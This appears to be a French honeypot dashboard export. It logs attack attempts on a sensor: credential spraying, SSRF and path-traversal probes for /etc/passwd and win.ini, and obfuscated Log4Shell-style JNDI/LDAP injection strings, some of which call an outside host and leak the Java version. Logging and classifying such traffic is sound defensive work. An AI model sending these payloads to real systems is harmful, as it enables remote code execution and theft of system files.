PUT /${${5x6:-j}${ipt:-n}${yi:u:-d}${5c:-i}${w3v:57:n5qp:-:}${jl:j:-l}${y:-d}${tbh2:2u:-a}${3we:42kn:-p}${g:dx6:-:}${jqa8:r:o:-/}${q4:-/}${7f:3r:bd:-P}${bkgc:-A}${wd:4x8s:-l}${vq:4:-0}${u3:-c}${ifv:--}${${uj10:-s}${i:-y}${lcf:jkd:c:-s}${va:4y:-:}${hy:-j}${
|
|||||||
| TCP | 9090 · PROMETHEUS | prometheus | Injection PHP php injection · via PROMETHEUS:9090 · (tentative d'exploit) | Élevée | Moyen · 52 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
Émulateur
PROMETHEUS
WAF
—
Recommandation
Investiguer
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
9090
Chemin / cible
—
Service
PROMETHEUS
Payload
ZSDLKFJ2 /${${z:pt:-j}${w0m:z:ev:-n}${w:-d}${q:uo:564v:-i}${y6e:ow:-:}${on:zx2n:-l}${m:akgs:p8tv:-d}${ca:vu:-a}${45:8h57:-p}${he
Pourquoi cette classification : Type « php_injection » (signaux protocolaires) · confiance 97%
Confiance classification
100%
Corrélation +18
Risque capteur
Moyen
· 52
Confiance : Confiance 97 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 933135
User-Agent
—
Règles WAF
—
Payload (extrait)
ZSDLKFJ2 /${${z:pt:-j}${w0m:z:ev:-n}${w:-d}${q:uo:564v:-i}${y6e:ow:-:}${on:zx2n:-l}${m:akgs:p8tv:-d}${ca:vu:-a}${45:8h57:-p}${he
Requête brute (extrait)
ZSDLKFJ2 /${${z:pt:-j}${w0m:z:ev:-n}${w:-d}${q:uo:564v:-i}${y6e:ow:-:}${on:zx2n:-l}${m:akgs:p8tv:-d}${ca:vu:-a}${45:8h57:-p}${heyd:-:}${do:54zx:pg5:-/}${6ze:-/}${a:kti:-P}${pe:4nah:-A}${7vec:56:1r:-l}${pr1g:wd7:-0}${gr:e6sj:-c}${j:--}${${3qic:2fc8:bf9:-s}$
|
|||||||
| TCP | 9090 · HTTP | http | Spray credentials bruteforce credential spray · via HTTP:9090 · (sonde / probe) · → /login | Élevée | Élevé · 68 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1078
TA0007
TA0001
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
9090
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « bruteforce_credential_spray » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 68
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1078
Beh Cred Stuff
Technique MITRE
T1078
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 921130 duplicate CL
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9090 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Int
Requête brute (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9090 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Length: 2905 Content-Type: |
|||||||
| TCP | 9090 · HTTP | http | Spray credentials bruteforce credential spray · via HTTP:9090 · (sonde / probe) · → /login | Élevée | Élevé · 68 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1078
TA0007
TA0001
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
9090
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « bruteforce_credential_spray » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 68
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1078
Beh Cred Stuff
Technique MITRE
T1078
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9090 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Int
Requête brute (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9090 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Type: application/json Cont |
|||||||
| TCP | 9090 · HTTP | http | Sonde port 9090/TCP port 9090 tcp · via HTTP:9090 · (sonde / probe) | Élevée | Moyen · 57 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
POST / UA ${${bd:un:-j}${4f0:-n}${5:-d}${l7:8o:l2:-i}${sxq:5of:-:}${c8qx:…
Émulateur
HTTP
WAF
23
Recommandation
Investiguer
Tags
Cible HTTP
POST
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
9090
Chemin / cible
/
Preuve honeypot — Sonde port 9090/TCP
Connexion détectée sur le port 9090 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_9090_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 57
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${bd:un:-j}${4f0:-n}${5:-d}${l7:8o:l2:-i}${sxq:5of:-:}${c8qx:zndm:9:-l}${yhu:t:-d}${wy:-a}${mi:-p}${d6:-:}${8o:yr:-/}${y9:z3:-/}${cmd:-U}${8na:ku0m:j30k:-A}${xdpb:vkx3:-l}${f:g:-0}${x6:-c}${471g:6l…
Règles WAF
rce-0
rce-14
nosqli-3
sap-sapcontrol-path
Payload (extrait)
POST / HTTP/1.1
Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9090
Accept: */*
User-Agent: ${${bd:un:-j}${4f0:-n}${5:-d}${l
Requête brute (extrait)
POST / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9090 Accept: */* User-Agent: ${${bd:un:-j}${4f0:-n}${5:-d}${l7:8o:l2:-i}${sxq:5of:-:}${c8qx:zndm:9:-l}${yhu:t:-d}${wy:-a}${mi:-p}${d6:-:}${8o:yr:-/}${y9:z3:-/}${cmd:-U}${8na:ku0m:j30k:-A}${
|
|||||||
| TCP | 9090 · HTTP | http | deser php attack deser php attack · via HTTP:9090 · (tentative d'exploit) · → /${${s19:rimc:-j}${f:m:-n}${ls2r:ge:8m0:-d}${m:… | Élevée | Élevé · 66 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /${${s19:rimc:-j}${f:m:-n}${ls2r:ge:8m0:-d}${m:wusl:-i}${s90:-:}${j:p8x:0ui:-l}${ufag:yr5:-d}${7yr:… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${s19:rimc:-j}${f:m:-n}${ls2r:ge:8m0:-d}${m:wusl:-i}${s90:-:}${j:p8x:0ui:-l}${ufag:yr5:-d}${7yr:y:izbf:-a}${owj9:tu71:ab:-p}${s:-:}${9:bp3l:-/}${g80p:thw:v:-/}${kr5g:-P}${wy4b:vafd:-A}${r:j6x4:oq97:-l}${7kb:-0}${be9:der:o:-c}${328:c:--}${${p:-s}${c:v:92kp:-y}${p:-s}${c:-:}${5ml:ux6i:2:-j}${37n:cg:-a}${citx:egq:82:-v}${kjz:-a}${z:xo:5:-.}${zs:ha:t:-v}${jznv:y:-e}${fia:t7:-r}${3k:zqpa:-s}${p:-i}${s:6m:-o}${5z8:-n}}${le:f62:-.}${q1d:fat:-b}${x2v:-c}${j29:-e}${w:itby:-8}${agz:2:-7}${cft:uav:ka:-7}${2:f5z:-c}
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
9090
Chemin / cible
/${${s19:rimc:-j}${f:m:-n}${ls2r:ge:8m0:-d}${m:wusl:-i}${s90:-:}${j:p8x:0ui:-l}${ufag:yr5:-d}${7yr:y:izbf:-a}${owj9:tu71:ab:-p}${s:-:}${9:bp3l:-/}${g80p:thw:v:…
Service
HTTP
Pourquoi cette classification : Type « deser_php_attack » (signaux protocolaires) · confiance 95%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 66
Confiance : Confiance 95 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0817
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
ET PHP serialize O:
CRS 933135
NFS mount string
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${s19:rimc:-j}${f:m:-n}${ls2r:ge:8m0:-d}${m:wusl:-i}${s90:-:}${j:p8x:0ui:-l}${ufag:yr5:-d}${7yr:y:izbf:-a}${owj9:tu71:ab:
Requête brute (extrait)
GET /${${s19:rimc:-j}${f:m:-n}${ls2r:ge:8m0:-d}${m:wusl:-i}${s90:-:}${j:p8x:0ui:-l}${ufag:yr5:-d}${7yr:y:izbf:-a}${owj9:tu71:ab:-p}${s:-:}${9:bp3l:-/}${g80p:thw:v:-/}${kr5g:-P}${wy4b:vafd:-A}${r:j6x4:oq97:-l}${7kb:-0}${be9:der:o:-c}${328:c:--}${${p:-s}${c:
|
|||||||
| TCP | 9090 · HTTP | http | Sonde port 9090/TCP port 9090 tcp · via HTTP:9090 · (sonde / probe) · → /${${4:-j}${nka6:xp40:-n}${n49j:vbzo:-d}${on1:v… | Élevée | Moyen · 58 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET /${${4:-j}${nka6:xp40:-n}${n49j:vbzo:-d}${on1:vwx:-i}${xw8:-:}${r1:89:-l}${fx9:zn:-d}${5:z:t:-a}${z… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${4:-j}${nka6:xp40:-n}${n49j:vbzo:-d}${on1:vwx:-i}${xw8:-:}${r1:89:-l}${fx9:zn:-d}${5:z:t:-a}${zf8b:-p}${68k:amxt:zske:-:}${m:csg:yt:-/}${es4:cw:-/}${ue:1b4:-P}${2qa:-A}${0zs:ik:57:-l}${y:gy:-0}${bik:tm1:l5t:-c}${ga:u3cs:nmp7:--}${${bjvp:34dy:bq1r:-s}${8:-y}${3b6:3e:tam:-s}${v:w:8pq:-:}${0:-j}${6ig:4n5:-a}${sbu7:-v}${vba0:-a}${5yvw:6:s:-.}${uoaq:58d:-v}${e4:-e}${e5wn:beg:qze7:-r}${06z4:4v0:6s:-s}${f3gj:5re:i:-i}${539n:gv:65:-o}${r0tv:63:qs6y:-n}}${5:-.}${8yk6:9ar:-b}${9a:-c}${5zle:1f:c8:-e}${swg:mu:-8}${
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
9090
Chemin / cible
/${${4:-j}${nka6:xp40:-n}${n49j:vbzo:-d}${on1:vwx:-i}${xw8:-:}${r1:89:-l}${fx9:zn:-d}${5:z:t:-a}${zf8b:-p}${68k:amxt:zske:-:}${m:csg:yt:-/}${es4:cw:-/}${ue:1b4…
Preuve honeypot — Sonde port 9090/TCP
Connexion détectée sur le port 9090 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_9090_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 58
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${4:-j}${nka6:xp40:-n}${n49j:vbzo:-d}${on1:vwx:-i}${xw8:-:}${r1:89:-l}${fx9:zn:-d}${5:z:t:-a}${zf8b:-p}${68k:amxt:zske:-:
Requête brute (extrait)
GET /${${4:-j}${nka6:xp40:-n}${n49j:vbzo:-d}${on1:vwx:-i}${xw8:-:}${r1:89:-l}${fx9:zn:-d}${5:z:t:-a}${zf8b:-p}${68k:amxt:zske:-:}${m:csg:yt:-/}${es4:cw:-/}${ue:1b4:-P}${2qa:-A}${0zs:ik:57:-l}${y:gy:-0}${bik:tm1:l5t:-c}${ga:u3cs:nmp7:--}${${bjvp:34dy:bq1r:-
|
|||||||
| TCP | 9090 · HTTP | http | Sonde port 9090/TCP port 9090 tcp · via HTTP:9090 · (sonde / probe) | Élevée | Moyen · 46 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
9090
Chemin / cible
/
Preuve honeypot — Sonde port 9090/TCP
Connexion détectée sur le port 9090 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_9090_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 46
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9090 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9090 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 X-Forwarded-For: ${${flg:-j}${dja:o:4o:-n}
|
|||||||
| TCP | 9090 · HTTP | http | Sonde port 9090/TCP port 9090 tcp · via HTTP:9090 · (sonde / probe) | Élevée | Moyen · 45 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET / UA ${${m6:-j}${kw:qt5l:w7af:-n}${eq0:lhc:-d}${on:-i}${18uv:w5j:hi4…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
9090
Chemin / cible
/
Preuve honeypot — Sonde port 9090/TCP
Connexion détectée sur le port 9090 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_9090_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 45
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${m6:-j}${kw:qt5l:w7af:-n}${eq0:lhc:-d}${on:-i}${18uv:w5j:hi4:-:}${esn:w:-l}${er:fvo4:-d}${oa:o:-a}${c:-p}${f:dsou:qh:-:}${1iue:-/}${l:fwg:ne2y:-/}${kj5:-U}${2:pbl:u:-A}${m:mw:-l}${ue:iu:-0}${h0a:m…
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1
Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9090
Accept: */*
User-Agent: ${${m6:-j}${kw:qt5l:w7af:-n}${eq0
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9090 Accept: */* User-Agent: ${${m6:-j}${kw:qt5l:w7af:-n}${eq0:lhc:-d}${on:-i}${18uv:w5j:hi4:-:}${esn:w:-l}${er:fvo4:-d}${oa:o:-a}${c:-p}${f:dsou:qh:-:}${1iue:-/}${l:fwg:ne2y:-/}${kj5:-U}${2
|
|||||||
| TCP | 8888 · HTTP | http | SSRF interne ssrf internal · via HTTP:8888 · (tentative d'exploit) | Élevée | Moyen · 55 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8888
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 55
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
HTTP alt 8888 probe
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8888 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8888 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8083 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8083 · (tentative d'exploit) · → /etc/passwd | Élevée | Élevé · 70 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /etc/passwd UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
27
Recommandation
Investiguer
Tags
Cible HTTP
GET
/etc/passwd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8083
Chemin / cible
/etc/passwd
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 70
Confiance : Confiance 100 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1083
pat-0716
pat-0802
pat-0137
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930160 etc passwd
MITRE T1083 file enum
SSRF Any-address SSRF
LFI path /etc/passwd
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /etc/passwd HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8083 Accept: */* User-Agent: Mozilla/5.0 (Macintosh;
Requête brute (extrait)
GET /etc/passwd HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8083 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8083 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8083 · (tentative d'exploit) · → /Windows/win.ini | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /Windows/win.ini UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
27
Recommandation
Investiguer
Tags
Cible HTTP
GET
/Windows/win.ini
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8083
Chemin / cible
/Windows/win.ini
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 69
Confiance : Confiance 100 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0715
CRS-930100-sub
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930150 boot ini
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /Windows/win.ini HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8083 Accept: */* User-Agent: Mozilla/5.0 (Macin
Requête brute (extrait)
GET /Windows/win.ini HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8083 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8200 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8200 · (tentative d'exploit) · → /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%… | Élevée | Élevé · 70 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
35
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/win.ini
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8200
Chemin / cible
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/win.ini
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: traversal ../ · Règle WAF « lfi-0 » · Traversal / LFI dans le chemin · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 70
Confiance : Confiance 100 % — Motif catalogue confirmé · 5 tag(s) WAF
Protocole émulé
1
Signaux
Http Lfi
pat-0715
CRS-930100-sub
Upstream
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930150 boot ini
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-0
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/wi
Requête brute (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/win.ini HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8200 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac |
|||||||
| TCP | 8200 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8200 · (tentative d'exploit) · → /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%… | Élevée | Élevé · 70 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
35
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8200
Chemin / cible
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: traversal ../ · Règle WAF « lfi-0 » · Traversal / LFI dans le chemin · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 70
Confiance : Confiance 100 % — Motif catalogue confirmé · 5 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1083
Http Lfi
pat-0716
pat-0137
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930160 etc passwd
LFI path /etc/passwd
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-0
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
Requête brute (extrait)
